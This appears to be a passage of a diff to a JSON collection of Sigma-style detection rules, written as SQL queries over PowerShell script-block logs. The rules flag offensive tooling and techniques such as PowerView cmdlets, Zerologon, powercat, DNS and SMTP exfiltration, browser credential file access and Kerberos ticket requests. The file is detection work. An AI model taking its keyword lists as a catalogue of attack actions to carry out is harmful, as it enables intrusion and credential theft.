'%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_send_mailmessage.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + ], + "filename": "posh_ps_frombase64string_archive.yml" + }, + { + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Security Software Discovery by Powershell", - "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "status": "test", - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", + "status": "experimental", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_security_software_discovery.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "PowerShell Remote Session Creation", + "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", + "author": "frack113", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "Powershell Suspicious Win32_PnPEntity", - "id": "b26647de-4feb-4283-af6b-6117661283c5", - "status": "test", - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "test", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.credential_access", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Admin script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_pnpentity.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "Suspicious SSL Connection", - "id": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", "status": "test", - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1573" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.Security.SslStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.Security.RemoteCertificateValidationCallback%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AuthenticateAsClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ssl_keyword.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.t1059.001" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ - "Legitimate usage of PowerShell 